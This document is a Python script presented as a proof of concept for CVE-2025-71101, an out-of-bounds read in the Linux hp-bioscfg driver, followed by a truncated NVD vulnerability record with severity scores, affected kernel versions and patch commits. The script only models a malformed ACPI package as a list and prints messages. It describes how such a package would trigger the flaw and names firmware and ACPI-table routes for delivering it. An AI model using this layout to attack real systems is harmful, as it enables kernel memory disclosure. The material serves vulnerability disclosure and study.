CVE-2025-71101

# CVE-2025-71101 PoC - hp-bioscfg out-of-bounds array access # This PoC demonstrates the vulnerability concept (requires kernel debugging environment) """ import ctypes import struct # ACPI package element types ACPI_TYPE_INTEGER = 0 ACPI_TYPE_STRING = 1 ACPI_TYPE_BUFFER = 2 ACPI_TYPE_PACKAGE = 3 class ACPI_OBJECT(ctypes.Structure): _fields_ = [ ('type', ctypes.c_int), ('data', ctypes.c_void_p), ] class MALFORMED_ACPI_PACKAGE: """ Simulates a malicious ACPI package that triggers OOB access in hp_populate_*_elements_from_package() functions. The vulnerability occurs when: 1. elem is within bounds 2. elem + offset (e.g., elem + reqs) exceeds array boundary 3. The code reads enum_obj[elem + reqs] without proper bounds check """ def __init__(self): # Craft ACPI package with ENUM_POSSIBLE_VALUES that has # more elements than the enum_obj array can accommodate self.elements = [] # Element 0: enum type marker self.elements.append(ACPI_TYPE_INTEGER) # type field self.elements.append(1) # count field # Element 1: PREREQUISITES - claims 5 prerequisites self.elements.append(ACPI_TYPE_PACKAGE) self.elements.append(5) # reqs = 5 # Element 2-6: Only 3 actual prerequisite elements # This creates mismatch: reqs=5 but only 3 elements provided self.elements.append(ACPI_TYPE_INTEGER) self.elements.append(1) self.elements.append(ACPI_TYPE_INTEGER) self.elements.append(2) self.elements.append(ACPI_TYPE_INTEGER) self.elements.append(3) # Missing 2 prerequisite elements! # Element 7: ENUM_POSSIBLE_VALUES starts here # enum_obj[elem + pos_values] will access beyond allocated array self.elements.append(ACPI_TYPE_PACKAGE) self.elements.append(10) # pos_values = 10 # The vulnerable code will try to read: # enum_obj[elem + 0] through enum_obj[elem + 9] # But the array was only sized for fewer elements def trigger_vulnerability(self): """ Trigger the out-of-bounds access by calling the vulnerable hp_populate_enum_elements_from_package() function. In real scenario, this would be triggered through: 1. ACPI table manipulation via BIOS or firmware update 2. HP BIOS Configuration Utility 3. Direct ACPI system table modification (requires kernel access) """ print("[*] Triggering CVE-2025-71101 vulnerability...") print("[*] ACPI package structure:") print(f" - Total elements: {len(self.elements)}") print(f" - PREREQUISITES claimed: 5, actual: 3") print(f" - ENUM_POSSIBLE_VALUES offset: 7") print("[*] Vulnerable code will access enum_obj[7+0] to enum_obj[7+9]") print("[!] Out-of-bounds read may occur if array size < 16 elements") print("[*] This could leak kernel memory contents") # Note: Actual exploitation requires: # - Root/privileged access to load malicious ACPI tables # - Or BIOS/firmware manipulation # - HP systems with hp-bioscfg driver loaded return True def main(): print("=" * 60) print("CVE-2025-71101 PoC - hp-bioscfg OOB Array Access") print("=" * 60) poc = MALFORMED_ACPI_PACKAGE() poc.trigger_vulnerability() print("\n[*] Mitigation:") print(" - Upgrade Linux kernel to patched version") print(" - Apply kernel patches from git.kernel.org:") print(" 79cab730dbaaac03b946c7f5681bd08c986e2abd") print(" cf7ae870560b988247a4bbbe5399edd326632680") print(" db4c26adf7117b1a4431d1197ae7109fee3230ad") print(" e44c42c830b7ab36e3a3a86321c619f24def5206") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-71101", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:10.030", "lastModified": "2026-03-25T18:56:12.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing\n\nThe hp_populate_*_elements_from_package() functions in the hp-bioscfg\ndriver contain out-of-bounds array access vulnerabilities.\n\nThese functions parse ACPI packages into internal data structures using\na for loop with index variable 'elem' that iterates through\nenum_obj/integer_obj/order_obj/password_obj/string_obj arrays.\n\nWhen processing multi-element fields like PREREQUISITES and\nENUM_POSSIBLE_VALUES, these functions read multiple consecutive array\nelements using expressions like 'enum_obj[elem + reqs]' and\n'enum_obj[elem + pos_values]' within nested loops.\n\nThe bug is that the bounds check only validated elem, but did not consider\nthe additional offset when accessing elem + reqs or elem + pos_values.\n\nThe fix changes the bounds check to validate the actual accessed index."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nplatform/x86: hp-bioscfg: Corrección de acceso a array fuera de límites en el análisis de paquetes ACPI\n\nLas funciones hp_populate_*_elements_from_package() en el controlador hp-bioscfg contienen vulnerabilidades de acceso a array fuera de límites.\n\nEstas funciones analizan paquetes ACPI en estructuras de datos internas utilizando un bucle for con la variable de índice 'elem' que itera a través de arrays enum_obj/integer_obj/order_obj/password_obj/string_obj.\n\nAl procesar campos de múltiples elementos como PREREQUISITES y ENUM_POSSIBLE_VALUES, estas funciones leen múltiples elementos de array consecutivos utilizando expresiones como 'enum_obj[elem + reqs]' y 'enum_obj[elem + pos_values]' dentro de bucles anidados.\n\nEl error es que la comprobación de límites solo validaba elem, pero no consideraba el desplazamiento adicional al acceder a elem + reqs o elem + pos_values.\n\nLa corrección cambia la comprobación de límites para validar el índice real accedido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.6.1", "versionEndExcluding": "6.6.120", "matchCriteriaId": "C5F84D90-D922-47D3-B042-99569840DD8F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.64", "matchCriteriaId": "32BF4A52-377C-44ED-B5E6-7EA5D896E98B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.4", "matchCriteriaId": "DC988EA0-0E32-457A-BF95-89BEB31A227B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.6:-:*:*:*:*:*:*", "matchCriteriaId": "E346B162-D566-4E62-ABDE-ECBFB21B8BFD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/79cab730dbaaac03b946c7f568 ... (truncated)